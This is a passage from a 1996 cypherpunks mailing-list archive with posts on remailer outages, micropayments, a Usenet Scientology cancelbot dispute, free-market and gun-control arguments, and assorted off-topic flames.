made it to Raph's list, I'm going to contact the admin at jpunix.com and
see if it's ok for me to point the middle-man remailer nym at his server.
Maybe it will be a little more reliable and allow the middle-man remailer
to work properly. Stay tuned for further details as they occur!

  middle-man-admin@alpha.c2.org (don't bother to reply, it doesn't work)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 8 Jun 1996 21:33:11 +0800
To: Bill Stewart <declan@well.com (Declan McCullagh)
Subject: Neologism: "crackerbox"
In-Reply-To: <199606080749.AAA26078@toad.com>
Message-ID: <v03006f04addf0980c7ed@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I think we have another winner, folks!

At 3:47 AM -0400 6/8/96, Bill Stewart wrote:
> It's probably close enough for anti-government work; the relative strength
> depends a lot on whether you're using general-purpose computers or
> custom crackerboxes, and on the state of the art in factoring technologies.
         ^^^^^^^^^^^^

I *like* it!

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Varian <hal@alfred.sims.berkeley.edu>
Date: Sun, 9 Jun 1996 03:37:58 +0800
To: Nick Szabo <szabo@netcom.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606060257.TAA16018@netcom.netcom.com>
Message-ID: <Pine.NXT.3.91.960608091548.3094C-100000@alfred.sims.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Nick Szabo wrote:

> 
> Some electronic commerce projects promise dramatically lower transaction
> costs, so that we can achieve "micropayments", "microintermediation",
> and so forth.  Is this achievable?  
> 

Well let me chip in on this.  First, my Web site at
   http://www.sims.berkeley.edu/resources/infoecon/Commerce.html
has links to lots of the relevant resources.

I think that there are really two accounting models that are being
discussed.  One is centralized accounting, a la the phone company.
The other is what I call "distributed accounting".  Models for
distributed accounting are postage stamps/meters, and cash.
In the distributed accounting model, individuals get tokens
(stamps, coins, dollars, BART cards, phone cards, etc.) and keep
track of their own usage.  This form of accounting is ideally suited
to micropayments.  You may lose your BART card, or your dollars,
but that risk is borne by the user.

As Stefan pointed out, micropayments can add up in a big organization.
But in the distributed accounting case, it is the organization's 
responsibilty for managing these payments.  Indeed, most organizations
have strict policies about petty cash, postage stamps, etc for just this 
reason. 

Centralized accounting is much more open-ended.  Here the risk of 
non-payment is often partially borne by the provider and partially
by the user.  This form of payment is typically used for repeated
purchases where reputation/credit-worthiness plays a big role.

Hal Varian, Dean           voice: 510-642-9980
SIMS, 102 South Hall       fax:   510-642-5814
University of California   hal@sims.berkeley.edu
Berkeley, CA 94720-4600    http://www.sims.berkeley.edu/~hal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 9 Jun 1996 02:03:35 +0800
To: freedom-knights@jetcafe.org
Subject: RFD: Time to kick some anti-scientologist ass?
Message-ID: <aRk8oD61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I haven't been paying a lot of attention to the Church of $cientology wars
until recently. Here's an executive summary for those who don't give a damn.

1. There's a gang of flamers (David Gerard, Jon Noring, Ron Newman, Rob J.
Nauta, and the like) who try to stop $cientologists from discussing their
religion on the Usenet newsgroup alt.religion.scientology. Most of them are
disgruntled former cult members and/or members of other similar cults.

2. The anti-scientologists have caused many cypherpunks anonymous remailers
to shut down via their egotistical misuse of them, viz. criminally posting
copyrighted Co$ writings to Usenet. They did it knowing that the Co$ is
likely to harrass the remailer operators, causing them to shut down and
depriving everyone of their services.

3. These harrassers are Usenet Cabal supporters, and they are sometimes
joined by initerant cabal enforcers such as Peter Vorobieff, who visit a.r.s
to lend a helping hand and to flame Co$.

4. Recently the anti-scientologists have asked me for a copy of my cancelbot,
and have been using it to forge cancels for scientologist posts on a.r.s.

Here's a typical anti-scientologist Usenet article lauding content-based
forged cancels:

]Path: ...!newsfeed.internetmci.com!howland.reston.ans.net!nntp.coast.net!harbinger.cc.monash.edu.au!news.rmit.EDU.AU!news.unimelb.EDU.AU!munnari.OZ.AU!news.mel.connect.com.au!news.mel.aone.net.au!fun
]From: fun%/etc/HOSTNAME (David Gerard)
]Newsgroups: alt.religion.scientology,alt.religion.scientology.xenu
]Subject: Re: Cancel Summary
]Followup-To: alt.religion.scientology,alt.religion.scientology.xenu
]Date: 5 Jun 1996 20:51:37 GMT
]Organization: Expert Marcabian Spam-Dodgers of the Universe
]Lines: 28
]Message-ID: <4p4s0p$h06@news.mel.aone.net.au>
]References: <SatJun1224302EDT1996@lightlink.com> <31b194aa.599605@news.clark.net>
]Reply-To: fun@suburbia.net
]NNTP-Posting-Host: athene.glasswings.com.au
]X-Newsreader: TIN [version 1.2 PL2]
]
]StarOwl (starowl@triskele.com) wrote:
]: On 1 Jun 1996 22:43:05 -0400, Lazarus <homer@lightlink.com> wrote:
]
]: >Thu May 30 00:48:49 EDT 1996  Lazarus V2.3
]: >lightlink.com/var/spool/news/control/1456170
]: >Article: 170077
]: >From: info@triskele.com (ARSE INFO SERVICEl)
]: >Date: Sun, 26 May 1996 13:22:08 GMT
]: >Subject: Bryan Wilson - In Conclusion.
]: >    Message-ID: <31a857ae.664540@news.clark.net>
]: >Control: cancel <31a857ae.664540@news.clark.net>
]
]: Great.  Even the parodies of spam get canceled.  :-/
]
]
]Well. This is actually GOOD NEWS. Because what it means is that there is at
]least one spam cancelbot on the case, as is eminently a wonderful idea for
]getting the hell RID of this shit ... in an entirely accepted and acceptable
]Usenet manner.
]
]If you can find the cancel, you can ask whoever zapped it to
]repost it I suppose, in such a way as to evade the cancelbot.
]
]Now what we need is MORE spam cancelbots on this material.
]
]
]--
]http://suburbia.net/~fun/scn/ -- if it doesn't work for you, email me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 9 Jun 1996 05:20:31 +0800
To: Robert Hettinga <declan@well.com (Declan McCullagh)
Subject: Re: Neologism: "crackerbox"
Message-ID: <2.2.32.19960608174620.00cb4094@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 AM 6/8/96 -0400, Robert Hettinga wrote:
>I think we have another winner, folks!
>
>At 3:47 AM -0400 6/8/96, Bill Stewart wrote:
>> It's probably close enough for anti-government work; the relative strength
>> depends a lot on whether you're using general-purpose computers or
>> custom crackerboxes, and on the state of the art in factoring technologies.
>         ^^^^^^^^^^^^
>
>I *like* it!

I am sorry, but the term "crackerbox" has been deemed derogatory to Southern
Americans by the Society for the Protection of American Minorities (SPAM).

You will have to apply for another neologism from the Bureau of Neologisms.
This time I suggest that you remember to fill out the proper paperwork so
that these problems will not occur in the future.  (To speed your
application, please include doubling the filing fee, the first half as a
check made out to the Bureau and the other half in cash.)


---
|Coors - For people who don't want to think about what they are drinking.|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 9 Jun 1996 06:16:11 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199606081816.LAA24268@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:38 PM 6/8/96 +0200, Anonymous wrote:

>Read the entire quote by Donne.  *...any man's death diminishes me, because 
I am involved in mankind;...*  By protecting Bell's right to speak what he 
thinks, we serve as an example to the rest of the world of what personal 
freedom really means. *Those crazy Americans* 
>
>Bell gives me the opportunity to say that his pronouncements are 
antithetical to the best interests of the _inhabitants_ of this nation, not 
simply the government itself.

>Thank you, Jim.   

While I appreciate your...uh...appreciation, let me remind you that part of 
my "pronouncements" are that the current political and social system is 
sick.  Many people around here seem to agree with this assessment.  What I 
advocate is a comparatively simple change in the rules that could have the 
effect of vastly changing the way things are done.  Whether these changes 
are in "the best interests of the inhabitants of this nation" is still an 
open question, and many people have agreed with me on this matter. 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Sun, 9 Jun 1996 02:37:37 +0800
To: cypherpunks@toad.com
Subject: Re: Is the alpha.c2.org 'Nymserver Down?
Message-ID: <9606081544.AA07498@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 6/7/96 -0700, anonymous wrote:
>My 'nym seems to be broken again, and I've heard other reports that
>the alpha.c2.org 'nymserver is down.  Yet, Raph's ping list seem to
>indicate it's healthy:
>
>remailer  email address                        history  latency  uptime
>-----------------------------------------------------------------------
>alpha    alias@alpha.c2.org               +-++**++-++*    49:22  99.66%
>
>What's the story?


   FWIW, I just pinged Host: alpha.c2.org - 
   64 bytes received, icmp _seq 1, time=384 ms
   --- Round-trip (ms)  min/avg/max = 384/384/384 ---

   I, however, have also heard that the remailer alias@alpha.c2.org has down
for a few days.


Regards -
Lynne


*************************************************************
Lynne L. Harrison, Esq.      |     "The key to life:
Poughkeepsie, New York       |      - Get up;
lharrison@mhv.net            |      - Survive;
http://www.dueprocess.com    |      - Go to bed."
*************************************************************

DISCLAIMER:  The above discussion is **NOT**  to be construed
as legal advice.  Proper protection of your legal rights may
require consultation with an attorney in a traditional setting.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 9 Jun 1996 03:29:46 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: RFD: Time to kick some anti-scientologist ass?
In-Reply-To: <aRk8oD61w165w@bwalk.dm.com>
Message-ID: <4liOMeG00YUyA52Gh9@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The attached summary is substantially incorrect. I know some of the
"flamers" you mentioned, and their intentions are *not* to stop the
Scientologists from discussing their religion.

On the contrary, the Scientologists are trying to make it very difficult
for anyone to *criticize* the Church of Scientology or reveal some of
its more wacky teachings.

For more info --

  Ron Newman's web page on the Church of Scientology:
    http://www.cybercom.net/~rnewman/scientology/
  Dave Touretzky's web page:
    http://www.cs.cmu.edu/~dst/Fishman/

-Declan

  

Excerpts from internet.cypherpunks: 8-Jun-96 RFD: Time to kick some
anti.. by Dr.Dimitri V. KOTM@bwalk 
> 1. There's a gang of flamers (David Gerard, Jon Noring, Ron Newman, Rob J.
> Nauta, and the like) who try to stop $cientologists from discussing their
> religion on the Usenet newsgroup alt.religion.scientology. Most of them are
> disgruntled former cult members and/or members of other similar cults.
>  
> 2. The anti-scientologists have caused many cypherpunks anonymous remailers
> to shut down via their egotistical misuse of them, viz. criminally posting
> copyrighted Co$ writings to Usenet. They did it knowing that the Co$ is
> likely to harrass the remailer operators, causing them to shut down and
> depriving everyone of their services.
>  
> 3. These harrassers are Usenet Cabal supporters, and they are sometimes
> joined by initerant cabal enforcers such as Peter Vorobieff, who visit a.r.s
> to lend a helping hand and to flame Co$.
>  
> 4. Recently the anti-scientologists have asked me for a copy of my cancelbot,
> and have been using it to forge cancels for scientologist posts on a.r.s.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 9 Jun 1996 07:17:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: NOISE: "Fascism is corporatism"
Message-ID: <199606081932.MAA03833@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Like someone who cannot resist looking at a dreadful traffic
accident, I continue to participate in this Detweiler inspired
troll:

At 07:09 PM 6/7/96 -0700, Rich Graves wrote:
> you forget that I'm a
> Certified Political Scientist. 
> [...]
> Once they got in power, then they started developing an economic ideology.

Untrue:

Fascism is of course a reasonably complete, coherent, and 
philosophically consistent logical system, almost as coherent as 
marxism, and far more logical than Mill's utilitarianism.  It was 
published and thoroughly debated well before they pursued or took power.

Rich Graves's lie is a lie I frequently hear from those who well 
know the truth, 

Many of my readers will think I am excessively harsh, calling Rich
Graves a liar rather than a fool, but I hear the above story 
(that fascism is not a coherent ideology or philosophy) primarily from
those whose interests this story serves, and if they genuinely 
thought this story was true, they would not know that it is in their
interests to push it.

Therefore one may reasonably conclude that most who push this story
are knowingly lying, that it is a widespread lie, not a widespread
fallacy or an alternate interpretation of the truth.

I mostly hear it from those whose economic ideology strongly resembles 
fascism, or those whose philosophy is directly descended from fascism, 
is in fact fascist philosophy.  Rich's economic ideology does not seem 
to resemble fascism, so I would guess he is in the second category
but not the first.  Most PC folk are postmodernists, poststructuralists,
deconstructionists, etc, which philosophies directly descend from fascist 
philosophy, and he seems to be PC, so this would explain his peculiar
assertion above.

Not only do such concepts as feminist science, phallocentric science, 
etc, strongly resemble such concepts as aryan science, jewish science, 
etc, but they are justified using the same arguments from the same 
philosophers.  Indeed Heidegger was not only a philosopher of fascism, 
but he personally participated in Hitler's terror, terrorizing his academic
colleagues, and Paul De Man of Yale University worked directly for the 
Nazis as a propagandist in occupied Belgium.

Hence the frequent lie by those who share this monstrous 
philosophy, that the fascists had no philosophy.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 9 Jun 1996 04:53:54 +0800
To: cypherpunks@toad.com
Subject: Re: RFD: Time to kick some anti-scientologist ass?
In-Reply-To: <4liOMeG00YUyA52Gh9@andrew.cmu.edu>
Message-ID: <XBq8oD69w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Declan B. McCullagh" <declan+@CMU.EDU> writes:

> The attached summary is substantially incorrect.

You mean, the anti-scientologists aren't massively forging cancels
for scientologits' posts on alt.religion.scientology using my cancelbot?

Or the anti-scientologists haven't caused most of the problems cypherpunks
remailers face through posting CO$ copyrighted material through them?

>                                                  I know some of the
> "flamers" you mentioned,

My condolences.

>                          and their intentions are *not* to stop the
> Scientologists from discussing their religion.

Then how come anyone who posts to a.r.s in support of the cult gets
harrassed by your acquaintances (flamed, mailbombed, etc)?

(Note: I'm not a Co$ affiliate and have exactly as much disdain for it as
for any other cult.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: test921148@alpha.c2.org
Date: Sun, 9 Jun 1996 07:19:30 +0800
To: cypherpunks@toad.com
Subject: alpha.c2.org IS UP AND RUNNING
Message-ID: <199606081930.MAA19819@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


alpha.c2.org is working well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 9 Jun 1996 07:06:45 +0800
To: cypherpunks@toad.com
Subject: Re: RFD: Time to kick some anti-scientologist ass?
Message-ID: <199606081945.MAA04681@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



"Declan B. McCullagh" <declan+@CMU.EDU> writes:
>> The attached summary is substantially incorrect.

At 12:29 PM 6/8/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>You mean, the anti-scientologists aren't massively forging cancels
>for scientologits' posts on alt.religion.scientology using my cancelbot?

No:  He means that the anti-scientologists are massively forging
cancels of robotically generated spam produced by the scientologists
in an effort to close down the alt.religion.scientology newsgroup.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 9 Jun 1996 08:17:25 +0800
To: cypherpunks@toad.com
Subject: Whalepunks, Marginpunks, Gunpunks, Clintonpunks, and Politics
Message-ID: <addf243d040210043520@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



To all the Whalepunks, Marginpunks, and Gunpunks,

I've been deleting after only a brief glance the dozens of posts on these
subjects (funny how some people who issue "pissograms" telling people
things are "off-topic" apparently think their own long rants on off-topic
subjects are just fine). However, this misstatement caught my eye:

At 6:30 PM 6/8/96, hallam@Etna.ai.mit.edu wrote:

>by government. I have even heard it stated that had gun ownership been
>more widespread
>in the UK the Dunblane massacre would not have occurred. Whether  the
>teacher was
>expected to gun down Hamilton with the Kalashnikov she carried to school
>each day or
>whether the tots were expected to come to her aid with Smith and Westons
>I'm not sure.
>In short I don't think that there is any type of piffle that the "most
>fuzzy headed free
>market types" cannot offer.

Some of the folks I know would point out the logical flaws in this model.

First, a Smith and Wesson is not what the tots should be carrying. An MP-5K
would fit nicely in their bookpacks (especially now that all yuppie kids
carry de rigeur designer backpacks, though mostly for designer water). More
firepower.

Second, the preferred "trans-humanist" solution is much cleaner: blow up
the classroom and then restore the innocents from backups.

(High-tech variant: "Kill them all and let the nanotech truth machines sort
them out.")

My point of view is that while schools should be free of guns, adult
citizens should probably have access to guns. There are, sadly, nutty
people who will use nearly any available weapon to commit mayhem and mass
murder. Rifles, shotguns, axes, knives... The "Luby's" cafeteria massacre
in Texas several years back is a better example than the Dunblane school
shooting (or the one in Tasmania, or the one in California....). There, had
some of the restaurant patrons been armed, it is likely that at least one
of them could have gotten off a shot. Further, many of these nutcase
killers are basically cowards, according to profiles I've read, and might
be fearful of sitiuations where there victims can shoot back. When they
know their victims are unarmed, are sheep for the slaughterhouse, I think
this causes more such "mukkings" (to use Brunner's prescient term from
"Stand on Zanzibar...Christ, what an imagination he had).

Remember, "Guns don't kill people, postal workers do."

In general, I think Phill raises some good points about the efficiency of
free markets. However, I doubt that Cypherpunks is the proper forum for
debating economic theory, for various reasons. I lean strongly toward the
free market side, inasmuch as I think most non-free market economies are
actually just cases where the government controls the _single_ corporation
they let run an industry, and thus one gets a worse situation that with the
grossest excesses of capitalism. More pollution, more strip-mining, more
denudation of forests, more destruction of lakes, etc. Look at the former
U.S.S.R. and Eastern Europe for a glimpse of what "state capitalism" can
do.

However, the reason many of us don't jump in and write defenses of free
markets here (and I would not have except to make my transhumanist joke--so
sue me) is that this list is not "Libernet" nor any of the similar
political discussion lists. Secondly, there is almost zero chance that any
of us will have our views changed by such political arguments, so why
bother?

(I do discuss what I think are the _logical implications_ of strong
cryptography and cryptoprivacy, and even the implications of crypto
anarchy, and I think these issues are "on-topic" for this list. Even if one
is a socialist, a fascist, a royalist, or a Wobbly, the implications remain
important.)

But arguing the merits of capitalism vs. socialism, for example, has rarely
been fruitful in the past 10 years of the Usenet, or on mailing lists, and
I doubt the debate will be more fruitful here.

The same goes for debate about Clinton, Hillary, Vince Foster, Whitewater,
etc. The fact that someone forwarded a Brock Meeks story in which he
(apparently, as I skimmed-then-deleted the story) make negative comments
about the Clintons, and then someone chimed in with points about her
allegedly illegal stock trades....well, these are clearly not list topics,
in my view of course.

(I claim no right to set the list agenda. Nor do I accept Perry's
oft-repeated claim that I am "causing" the list's decline by stating my
views on this point.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 9 Jun 1996 08:05:02 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
Message-ID: <199606082022.NAA20567@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu wrote:

>Whether  the teacher was 
>expected to gun down Hamilton with the Kalashnikov she carried to school
each day or 
>whether the tots were expected to come to her aid with Smith and Westons
I'm not sure. 

Are Smith and Westons like Bolt .45s?

-Master D.M. Rose, M.B.A (Harvard) Looks pretty foolish, doesn't it? But
usually, people just call me Davve.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nCognito@rigel.cyberpass.net (Anonymous)
Date: Sun, 9 Jun 1996 08:04:15 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signatures
In-Reply-To: <19960607141610.13186.qmail@ns.crynwr.com>
Message-ID: <199606082036.NAA25594@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Michael Froomkin writes:
> 
>  > >  > 	The law does not specify how an electronic document must be 
>  > >  > signed, but Barassi and others say it probably will mean coding the text 
>  > >  > and typed signature so they cannot be changed by anyone other than the 
>  > >  > writer.
>  > 
>  > Before you get all hot under the collar, may I note that I've known
>  > Barassi for more than a year, and he is very technically sophisticated.
>  > Allow for some reporter-garble.   Barassi understands digital signatures
>  > as well as you do.
> 

I suppose that I'll have to trust you on this score, and hope that you're 
correct.  Unfortunately, however, even if you are correct, it doesn't 
mean that the law that eventually makes it through commitee will provide 
any useful guidelines. <shrug> But this thread has decended to noizes, so 
I'm out. 

Adios..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 9 Jun 1996 05:21:32 +0800
To: qut@netcom.com
Subject: "qut"
In-Reply-To: <199606080730.AAA24004@netcom13.netcom.com>
Message-ID: <199606081750.NAA21341@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"qut" the imbecile writes:
> REAL crypto-anarchists, of course, want the 
> destruction of copyrights, trademarks, and
> other weapons of capitali$m, and will
> implement crypto-anonymonity to proceed
> forthwith.

No one speaks for all anarchists, or even anyone other than
themselves.

I realize that you are trolling, but, speaking for me, you're a
fruitcake.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sun, 9 Jun 1996 08:33:43 +0800
To: cypherpunks@toad.com
Subject: Re: Internet solution for law enforcement
Message-ID: <199606082052.NAA28043@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


"Alan Horowitz" alanh@infi.net wrote:

>It appears that someone has figured out that medium-sized jurisdictions 
>don't want to be left out of the trendiness. And has put together a 
>product that can be peddled at the trade shows where Police Chiefs go.
>
>I recall reading that there's something like 25,000 different police 
>departments in America. It's a sizeable market. And a very politically 
>correct one, right now.
>
>Do these managers _need_ this stuff? Well, did they _need_ all those 
>black-ninja hollywood flavored SWAT uniforms?
>
>Now, if they could just get a few more PC-of-the-month phraseologies into 
>the title of their product, they'd sell twice as many.  Start with 
>"anti-deadbeat-dad software", maybe. "Pro Diversity". "Environmentally 
>Friendly Software".
>
>Is America great, or what?

You bet.  PC stuff is essential.  Here in Tucson, the cops came up with a
novel, simple, cheap, and efficacious method to determine cocaine HCl usage:
Put a strip of Scotch (TM) tape across the nostrils of a
suspectee/apprehendee and see if there's any toot on it.

Local judges disallowed this procedure because, in the absence of a
substantial presence of African-Americans in the "community" (they comprise
<2% of local population), almost all of those arrested were
Hispanic-surnamed Latinos.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 9 Jun 1996 00:45:37 +0800
To: cypherpunks@toad.com
Subject: BIO_nfo
Message-ID: <199606081353.NAA20540@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A biocryptoanarchy link to Adleman's DNA work? 
 
 
   6-8-96. FiTi: 
 
   "Bioinformatics: the jobs of the future." 
 
      One of the biggest manpower shortages today is in 
      bioinformatics, the area in which biology meets computer 
      science. Biology is becoming a data-intensive science, 
      in the same way that physics did almost 50 years ago 
      when it became clear that computers would be needed not 
      only to store information but also to process it. 
      There's a great shortage of people, partly because a 
      lot of organisations are simultaneously seeing the need 
      for bioinformatics and partly because the skills 
      required are changing so fast:  
 
      + Search and analysis, including new mathematical 
      techniques for finding patterns in data; 
 
      + Knowledge management, including ways to integrate 
      information from different databases; 
 
      + Mapping and genomics, including approaches to 
      identifying the genetic components of complex traits; 
 
      + Sequence/structure/function including rapid methods to 
      predict the biological function of a gene from its DNA. 
 
      The mainstream computer and information technology 
      companies are only just beginning to take an interest in 
      bioinformatics. "There's a huge vacuum there." For an 
      undergraduate scientist searching for a field in which 
      to specialise, there are no better job prospects than 
      bioinformatics or - cheminformatics. 
 
   BIO_nfo 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 9 Jun 1996 05:25:19 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <199606080829.EAA22187@linet02.li.net>
Message-ID: <199606081754.NAA21353@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> Oh, come on now, Perry - while Friedman has more sense than that,
> you've been around the Libertarian party long enough to know people
> who call themselves free-market environmentalists who contend that whales
> will be best protected if they're owned property,

Sure, but Dr. Phill Hallam-Baker, D.Phil., was contending that
Friedman said the free market solution was for people to voluntarily
stop buying whale meat -- he wasn't even contending that Friedman said
the whales should be owned. Dr. Phill Hallam-Baker, D.Phil., presented
a portrait of Friedman that is so totally out of line with even the
most fuzzy headed free market types that it is almost impossible to
believe that he said anything of the sort.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Sun, 9 Jun 1996 08:32:58 +0800
To: cypherpunks@toad.com
Subject: Visual Basic, C++ Programmer
In-Reply-To: <01BB5460.9B743B20@ppp3>
Message-ID: <Pine.3.89.9606081407.A7593-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain



I am interested in talking with any people that are fluent in Visual 
Basic or C++, and are independtly minded.  The needed programs are small 
programs that need to be written for a growing company.  Interested 
people, please contact me via email at: cibir@netcom.com


Thanks!

Joseph Seanor
CIBIR Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 9 Jun 1996 05:57:57 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Internet solution for law enforcement
In-Reply-To: <Pine.GUL.3.93.960607215457.1728A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SV4.3.91.960608141857.10776D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


It appears that someone has figured out that medium-sized jurisdictions 
don't want to be left out of the trendiness. And has put together a 
product that can be peddled at the trade shows where Police Chiefs go.

I recall reading that there's something like 25,000 different police 
departments in America. It's a sizeable market. And a very politically 
correct one, right now.

Do these managers _need_ this stuff? Well, did they _need_ all those 
black-ninja hollywood flavored SWAT uniforms?

Now, if they could just get a few more PC-of-the-month phraseologies into 
the title of their product, they'd sell twice as many.  Start with 
"anti-deadbeat-dad software", maybe. "Pro Diversity". "Environmentally 
Friendly Software".

Is America great, or what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sun, 9 Jun 1996 05:57:57 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <199606081754.NAA21353@jekyll.piermont.com>
Message-ID: <9606081830.AA05221@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Sure, but Dr. Phill Hallam-Baker, D.Phil., was contending that
>Friedman said the free market solution was for people to voluntarily
>stop buying whale meat -- he wasn't even contending that Friedman said
>the whales should be owned. Dr. Phill Hallam-Baker, D.Phil., presented
>a portrait of Friedman that is so totally out of line with even the
>most fuzzy headed free market types that it is almost impossible to
>believe that he said anything of the sort.


Perry, 

	Apart from hero worship why do you believe that Friedman is not able to say 
anything ridiculous? I found the letter to be ridiculous which is why I remember it. 

	Since you were so certain that Hess was not a staff member of the Cato institute 
despite being listed as such on their home page is it not just a little possible that 
you might be wrong in this case?

	Plus, to say that such an analysis would be out of line with "even the most 
fuzzy headed free market types" is somewhat rich. I have heard plans to eliminate all 
government apart from the army, privatising roads and the police. I have heard numerous 
claims that monopolies cannot ever exist under any circumstances unless they are created 
by government. I have even heard it stated that had gun ownership been more widespread 
in the UK the Dunblane massacre would not have occurred. Whether  the teacher was 
expected to gun down Hamilton with the Kalashnikov she carried to school each day or 
whether the tots were expected to come to her aid with Smith and Westons I'm not sure. 
In short I don't think that there is any type of piffle that the "most fuzzy headed free 
market types" cannot offer.

	How to save the whales is a logical outcome of Friedman's thesis that markets 
are everything. It is unfortunately very common for great men to get megalomania and 
believe they have the solution to the worlds problems in one theory.

	The flaw in Perry's "stakeholder" theory is the same one in many academic 
theories. It assumes that most people are smart enough to realise their true interests. 
It assumes that people take a longer term look than they do. 

	
		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 9 Jun 1996 05:55:59 +0800
To: foodie@netcom.com
Subject: Re: Thank you for the Archives 100 messages
